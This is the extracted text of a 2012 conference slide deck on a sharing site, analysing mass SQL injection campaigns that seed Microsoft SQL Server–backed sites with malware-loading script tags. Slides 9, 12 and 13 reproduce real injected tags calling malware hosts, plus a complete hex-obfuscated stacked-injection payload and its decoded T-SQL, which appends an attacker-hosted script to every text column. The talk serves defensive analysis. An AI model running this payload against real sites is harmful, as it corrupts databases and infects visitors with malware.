Advertisement

Analysis of mass SQL injection attacks

Miroslav Stampar
Information security, penetration testing, software development, @sqlmap
Sep. 20, 2012
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacks

Check these out next

Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Positive Hack Days
Hack ASP.NET website
Hack ASP.NET website
Positive Hack Days
Эксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAP
Positive Hack Days
Mem forensic
Mem forensic
Chong-Kuan Chen
OpenSSL Basic Function Call Flow
OpenSSL Basic Function Call Flow
William Lee
Crypto With OpenSSL
Crypto With OpenSSL
Zhi Guan
ToroDB: scaling PostgreSQL like MongoDB / Álvaro Hernández Tortosa (8Kdata)
ToroDB: scaling PostgreSQL like MongoDB / Álvaro Hernández Tortosa (8Kdata)
Ontico
Object Oriented Code RE with HexraysCodeXplorer
Object Oriented Code RE with HexraysCodeXplorer
Alex Matrosov
1 of 40

Analysis of mass SQL injection attacks

Sep. 20, 2012
Download to read offline
Technology

These are the slides from a talk "Analysis of mass SQL injection attacks" held at FSec 2012 conference (Croatia / Varazdin 21st September 2012) by Miroslav Stampar

Miroslav Stampar
Information security, penetration testing, software development, @sqlmap
Advertisement
Advertisement
Advertisement

Recommended

Heuristic methods used in sqlmapHeuristic methods used in sqlmap
Heuristic methods used in sqlmapMiroslav Stampar8.3K views24 slides
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar635 views29 slides
Hash DoS AttackHash DoS Attack
Hash DoS AttackMiroslav Stampar7.6K views27 slides
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar1.1K views35 slides
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Miroslav Stampar674 views35 slides
sqlmap internalssqlmap internals
sqlmap internalsMiroslav Stampar621 views36 slides

More Related Content

Slideshows for you(20)

Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Positive Hack Days2.5K views
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
Positive Hack Days34.9K views
Эксплуатируем неэксплуатируемые уязвимости SAPЭксплуатируем неэксплуатируемые уязвимости SAP
Эксплуатируем неэксплуатируемые уязвимости SAP
Positive Hack Days852 views
Mem forensicMem forensic
Mem forensic
Chong-Kuan Chen709 views
OpenSSL Basic Function Call FlowOpenSSL Basic Function Call Flow
OpenSSL Basic Function Call Flow
William Lee5.1K views
Crypto With OpenSSLCrypto With OpenSSL
Crypto With OpenSSL
Zhi Guan17.5K views
ToroDB: scaling PostgreSQL like MongoDB / Álvaro Hernández Tortosa (8Kdata)ToroDB: scaling PostgreSQL like MongoDB / Álvaro Hernández Tortosa (8Kdata)
ToroDB: scaling PostgreSQL like MongoDB / Álvaro Hernández Tortosa (8Kdata)
Ontico1.6K views
Object Oriented Code RE with HexraysCodeXplorerObject Oriented Code RE with HexraysCodeXplorer
Object Oriented Code RE with HexraysCodeXplorer
Alex Matrosov2.8K views
Veil-PowerView - NovaHackersVeil-PowerView - NovaHackers
Veil-PowerView - NovaHackers
VeilFramework3.4K views
Java 7 & 8 New FeaturesJava 7 & 8 New Features
Java 7 & 8 New Features
Leandro Coutinho279 views
9 password security9 password security
9 password security
drewz lin5.2K views
Meetup mini conférences AFUP Paris Deezer Janvier 2017Meetup mini conférences AFUP Paris Deezer Janvier 2017
Meetup mini conférences AFUP Paris Deezer Janvier 2017
Alexis Von Glasow364 views
Password (in)securityPassword (in)security
Password (in)security
Enrico Zimuel10.1K views
Password SecurityPassword Security
Password Security
CSCJournals289 views
First Ride on RustFirst Ride on Rust
First Ride on Rust
David Evans60.2K views
Password SecurityPassword Security
Password Security
Alex Hyer309 views
OpenSSL programming (still somewhat initial version)OpenSSL programming (still somewhat initial version)
OpenSSL programming (still somewhat initial version)
Shteryana Shopova3.8K views
Distributed systems at ok.ru #rigadevdayDistributed systems at ok.ru #rigadevday
Distributed systems at ok.ru #rigadevday
odnoklassniki.ru2.9K views
Rust Intro @ Roma Rust meetup Rust Intro @ Roma Rust meetup
Rust Intro @ Roma Rust meetup
Claudio Capobianco298 views
12 virtualmachine12 virtualmachine
12 virtualmachine
The World of Smalltalk1K views

Similar to Analysis of mass SQL injection attacks(20)

Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web Vulnerability
Miroslav Stampar7.1K views
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)
Miroslav Stampar4.4K views
ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven V...ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven V...
ASFWS 2012 - Node.js Security – Old vulnerabilities in new dresses par Sven V...
Cyber Security Alliance10.6K views
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA
guestfdcb8a452 views
Robert hall2017 android_npRobert hall2017 android_np
Robert hall2017 android_np
Robert Hall93 views
Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparen...Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparen...
Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparen...
Priyanka Aash480 views
NodeJS for Novices - 28/Oct/13 - Winnipeg, MBNodeJS for Novices - 28/Oct/13 - Winnipeg, MB
NodeJS for Novices - 28/Oct/13 - Winnipeg, MB
David Wesst987 views
OWASP an Introduction OWASP an Introduction
OWASP an Introduction
alessiomarziali891 views
Ah java-ppt1Ah java-ppt1
Ah java-ppt1
Haja Abdul Khader A51 views
Hacklu2012 v07Hacklu2012 v07
Hacklu2012 v07
F _877 views
SQL/JavaScript Hybrid Worms As Two-stage Quines SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines
José Ignacio418 views
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
guest3379bd1.3K views
Meteoro de pegasuus! Desenvolvendo aplicações realtime com MeteorJSMeteoro de pegasuus! Desenvolvendo aplicações realtime com MeteorJS
Meteoro de pegasuus! Desenvolvendo aplicações realtime com MeteorJS
Julio Antonio Mendonça de Marins488 views
Vladyslav_Chapiuk_Resume_enVladyslav_Chapiuk_Resume_en
Vladyslav_Chapiuk_Resume_en
Vladislav Chapiuk860 views
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
Jim Manico16.3K views
APEX Alpe Adria 2019 - JavaScript in APEX - do it right!APEX Alpe Adria 2019 - JavaScript in APEX - do it right!
APEX Alpe Adria 2019 - JavaScript in APEX - do it right!
Marko Gorički1.3K views
Ed presents JSF 2.2 and WebSocket to Gameduell.Ed presents JSF 2.2 and WebSocket to Gameduell.
Ed presents JSF 2.2 and WebSocket to Gameduell.
Edward Burns3.9K views
The Log4Shell Vulnerability – explained: how to stay secureThe Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secure
Kaspersky1.1K views
Isomorphic JS - new silver bulletIsomorphic JS - new silver bullet
Isomorphic JS - new silver bullet
imevs877 views
REX CraftConf 2022 / Supply Chain AttackREX CraftConf 2022 / Supply Chain Attack
REX CraftConf 2022 / Supply Chain Attack
Yvan PHELIZOT27 views
Advertisement

More from Miroslav Stampar(15)

sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"
Miroslav Stampar490 views
Blind WAF identificationBlind WAF identification
Blind WAF identification
Miroslav Stampar1.6K views
sqlmap internalssqlmap internals
sqlmap internals
Miroslav Stampar2.4K views
Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic Denoise
Miroslav Stampar258 views
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical Infrastructure
Miroslav Stampar380 views
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the Bears
Miroslav Stampar280 views
Non-Esoteric XSS Tips & TricksNon-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & Tricks
Miroslav Stampar1.6K views
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?
Miroslav Stampar7.2K views
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)
Miroslav Stampar1.1K views
Smashing the BufferSmashing the Buffer
Smashing the Buffer
Miroslav Stampar2K views
Curious Case of SQLiCurious Case of SQLi
Curious Case of SQLi
Miroslav Stampar10.3K views
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the Hood
Miroslav Stampar21K views
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection Attacks
Miroslav Stampar8.9K views
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmap
Miroslav Stampar33.6K views
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in Python
Miroslav Stampar16.5K views

Recently uploaded(20)

Storybook, the best friend we all needStorybook, the best friend we all need
Storybook, the best friend we all need
AnnaSala220 views
Angiography Imaging Systems.pdfAngiography Imaging Systems.pdf
Angiography Imaging Systems.pdf
RushiDalve0 views
Blockchain TechnologyBlockchain Technology
Blockchain Technology
Aryan Chaudhary0 views
d9f0992b5cb6478fa0dfff092cccc2d2.pdfd9f0992b5cb6478fa0dfff092cccc2d2.pdf
d9f0992b5cb6478fa0dfff092cccc2d2.pdf
ThnhNguynVn970 views
Computerized AIS (AIS, TPS and Double-Entry).pptComputerized AIS (AIS, TPS and Double-Entry).ppt
Computerized AIS (AIS, TPS and Double-Entry).ppt
franciskishushu0 views
Impact Of Biotechnologies On Genetic Diversity Of Cattle Populations.pptxImpact Of Biotechnologies On Genetic Diversity Of Cattle Populations.pptx
Impact Of Biotechnologies On Genetic Diversity Of Cattle Populations.pptx
AkashYaqoob0 views
ServeDocs - User Guide.pdfServeDocs - User Guide.pdf
ServeDocs - User Guide.pdf
VivekPatil6078810 views
Biological Neural Network.pptxBiological Neural Network.pptx
Biological Neural Network.pptx
Abdul Rehman0 views
Role of MV Cable Accessories.pdfRole of MV Cable Accessories.pdf
Role of MV Cable Accessories.pdf
Compaq International (P) Limited0 views
DIGITAL-ELECTRONICS-DESIGN.pptxDIGITAL-ELECTRONICS-DESIGN.pptx
DIGITAL-ELECTRONICS-DESIGN.pptx
SofiaArquero20 views
Iguana - openSUSE Conf 2023Iguana - openSUSE Conf 2023
Iguana - openSUSE Conf 2023
Ondrej Holecek0 views
Smart Packaging Technology | Connected Packaging Solutions | EnnoventureSmart Packaging Technology | Connected Packaging Solutions | Ennoventure
Smart Packaging Technology | Connected Packaging Solutions | Ennoventure
Ennoventure0 views
PLG Assignment 1_Sourabh Pal.pptxPLG Assignment 1_Sourabh Pal.pptx
PLG Assignment 1_Sourabh Pal.pptx
SourabhPAL420 views
Java-if-Statement-Activity2.docxJava-if-Statement-Activity2.docx
Java-if-Statement-Activity2.docx
SofiaArquero20 views
Decision Transformers Model.pdfDecision Transformers Model.pdf
Decision Transformers Model.pdf
JamieDornan20 views
Galaxy Calendar by Slidesgo.pptxGalaxy Calendar by Slidesgo.pptx
Galaxy Calendar by Slidesgo.pptx
JorgeEnrique670 views
AM painpoints by personas.pptxAM painpoints by personas.pptx
AM painpoints by personas.pptx
mina2764360 views
SOPHIA-The Robot.pptxSOPHIA-The Robot.pptx
SOPHIA-The Robot.pptx
ManjariPorwal0 views
Virtual IMU Data Augmentation by Spring-Joint Model for Motion Exercises Reco...Virtual IMU Data Augmentation by Spring-Joint Model for Motion Exercises Reco...
Virtual IMU Data Augmentation by Spring-Joint Model for Motion Exercises Reco...
sugiuralab0 views
Brochure-Sodium-Hydroxide.pdfBrochure-Sodium-Hydroxide.pdf
Brochure-Sodium-Hydroxide.pdf
pinit10 views
Advertisement

Analysis of mass SQL injection attacks

  1. Analysis of mass SQL injection attacks Miroslav Štampar (dev@sqlmap.org)
  2. FUD (Fear, Uncertainty, Doubt)  “A new virus is making the rounds and is wreaking havoc on the Internet”  “Whatever language is used to write to the database, all SQL databases use the same basic formulas for writing and retrieving data”  “Targets that bottleneck in the technology, making it platform-independent… Whether the machine is using ASP, ColdFusion, JSP, PHP, or whatever else”  “...blazing through the internet, infecting more than half a million domains around the world to date and as many as 1.5 million URLs” FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 2
  3. Google is (not) your friend (1) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 3
  4. Google is (not) your friend (2) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 4
  5. Google is (not) your friend (3) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 5
  6. What's it all about?  Platform dependent (IIS/ASP(.NET))  DBMS dependent (Microsoft SQL Server)  Highly automated (tool-based) approach  Popular SQL enumeration tools with or without Google search capability don't count (e.g. sqlmap, Havij, Pangolin)  Infection(s) counting in thousands of domains (not millions as previously believed)  Dummy as it can be (usually one request per target)  In short: malware distribution FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 6
  7. Modus operandi  Get hands on couple of 1-day exploits  Blindly inject SQL payload carrying malicious content (<script>, <iframe>, etc.) into content tables of as much as possible vulnerable web servers  Leverage exploit(s) and/or user's lack of technical knowledge to install malware (spyware, trojans, etc.) to visitor's computer  Profit(???) - (DEFCON 18 – Garry Pejski: “My Life As A Spyware Developer”) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 7
  8. Sample leveraged exploits  CVE-2012-4681 Oracle Java 7 Update 6  CVE-2012-1889 Microsoft XML Core Services  CVE-2012-1723 Java Runtime Environment  CVE-2012-0507 Java Runtime Environment  CVE-2011-3544 Java Runtime Environment  CVE-2011-2110 Adobe Flash Player  CVE-2011-0611 Adobe Flash Player  CVE-2010-3552 New Java Plug-in  CVE-2010-0188 Adobe Reader  etc. FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 8
  9. Notable members (1)  Lilupophilupop (sl.php)  "></title><script src="http://lilupophilupop.com/sl.php"></script><!--  Nikjju (r.php)  <script src=http://nikjju.com/r.php></script>  Robint (u.js)  <script src=http://ww.robint.us/u.js></script>  LizaMoon (ur.php)  </title><script src=http://lizamoon.com/ur.php></script>  Jjghui (urchin.js)  </title><script src=http://jjghui.com/urchin.js></script> FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 9
  10. Notable members (2) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 10
  11. Notable members (3) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 11
  12. Generic payload (obfuscated) GET /vuln.asp?param=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C40 4320564152434841522832353529204445434C415245205461626C655F43 7572736F7220435552534F5220464F522053454C45435420612E6E616D65 2C622E6E616D652046524F4D207379736F626A6563747320612C73797363 6F6C756D6E73206220574845524520612E69643D622E696420414E442061 2E78747970653D27752720414E442028622E78747970653D3939204F5220 ............................................................ 5845432827555044415445205B272B40542B275D20534554205B272B4043 2B275D3D525452494D28434F4E5645525428564152434841522834303030 292C5B272B40432B275D29292B27273C736372697074207372633D687474 703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F73637269 70743E27272729204645544348204E4558542046524F4D205461626C655F 437572736F7220494E544F2040542C404320454E4420434C4F5345205461 626C655F437572736F72204445414C4C4F43415445205461626C655F4375 72736F7220 AS VARCHAR(4000));EXEC(@S);-- FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 12
  13. Generic payload (decoded) DECLARE @t VARCHAR(255), @c VARCHAR(255) DECLARE table_cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) /* NTEXT, TEXT, NVARCHAR, VARCHAR */ OPEN table_cursor FETCH NEXT FROM table_cursor INTO @t,@c WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@t+'] SET ['+@c+']=RTRIM(CONVERT(VARCHAR, ['+@c+']))+''<script src=http://www.attacker.com/malicious.js></script>''') FETCH NEXT FROM table_cursor INTO @t,@c END CLOSE table_cursor DEALLOCATE table_cursor FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 13
  14. Analysis (1)  Piggy backing (stacked) SQL injection  Obfuscated SQL code (hex encoded)  Decoded code dynamically executed with T- SQL EXEC command  Usage of cursor for update  Iterating over all tables / all text-like columns  Appending malicious content (e.g. <script src=...) to all matched column entries using UPDATE statement FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 14
  15. Analysis (2) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 15
  16. Analysis (3) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 16
  17. Example (1) - FAIL FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 17
  18. Example (2) - FAIL FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 18
  19. Example (3) - FAIL FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 19
  20. Example (4) – CLUSTER FAIL FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 20
  21. Example (5) - SUCCESS FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 21
  22. Example (6) - SUCCESS FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 22
  23. Asprox (1)  Spam botnet used for phishing scams (>10K bots)  Developed over years  Interesting update “msscntr32.exe” (SQL attack tool)  Google search for targets (e.g. inurl:".asp")  Launch SQL injection attacks against resulting pages FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 23
  24. Asprox (2) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 24
  25. CLI (1)  Standalone executable  Rare beast (Chinese underground forums?)  Google search for targets (e.g.: inurl:".asp" inurl:"a=")  Configurable malicious tag that will be inserted (originally <script src=http://www.2117966.net/fuckjp.js></s cript>)  Wild guess is that attackers are being paid for using the tool (backcall to *.cn/pay.asp? SN=...) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 25
  26. CLI (2) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 26
  27. Sample tool (1) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 27
  28. Sample tool (2) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 28
  29. Sample tool (3) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 29
  30. Sample tool (4) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 30
  31. Sample tool (5) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 31
  32. Sample run (1) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 32
  33. Sample run (2) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 33
  34. Sample run (3) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 34
  35. Sample run (4) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 35
  36. Sample run (5) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 36
  37. Sample run (6) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 37
  38. Sample run (7) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 38
  39. Sample run (8) FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 39
  40. Questions? FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 40
Advertisement